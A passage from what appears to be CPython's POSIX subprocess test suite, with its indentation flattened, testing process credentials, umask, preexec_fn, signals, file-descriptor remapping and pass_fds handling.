@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
if grp is not None:
group_list.append(name_group)
for group in group_list + [gid]:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(group=group, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getgid())"],
group=group,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
else:
if isinstance(group, str):
group_gid = grp.getgrnam(group).gr_gid
else:
group_gid = group
child_group = int(output)
self.assertEqual(child_group, group_gid)
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=-1)
with self.assertRaises(OverflowError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ, group=2**64)
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
perm_error = False
if grp is not None:
group_list.append(name_group)
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
extra_groups=group_list)
except OSError as ex:
if ex.errno != errno.EPERM:
raise
perm_error = True
else:
parent_groups = os.getgroups()
child_groups = json.loads(output)
if grp is not None:
desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
for g in group_list]
else:
desired_gids = group_list
if perm_error:
self.assertEqual(set(child_groups), set(parent_groups))
else:
self.assertEqual(set(desired_gids), set(child_groups))
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ,
extra_groups=[2**64])
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
'POSIX umask() is not available.')
def test_umask(self):
tmpdir = None
try:
tmpdir = tempfile.mkdtemp()
name = os.path.join(tmpdir, "beans")
# We set an unusual umask in the child so as a unique mode
# for us to test the child's touched file for.
subprocess.check_call(
[sys.executable, "-c", f"open({name!r}, 'w').close()"],
umask=0o053)
# Ignore execute permissions entirely in our test,
# filesystems could be mounted to ignore or force that.
st_mode = os.stat(name).st_mode & 0o666
expected_mode = 0o624
self.assertEqual(expected_mode, st_mode,
msg=f'{oct(expected_mode)} != {oct(st_mode)}')
finally:
if tmpdir is not None:
shutil.rmtree(tmpdir)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
enabled = gc.isenabled()
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
finally:
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
self.assertEqual(out, b'apple')
self.assertEqual(err, b'orange')
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = os.read(temp_fds[0], 1024).strip()
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = os.read(stderr_no, 1024).strip()
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = import_helper.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
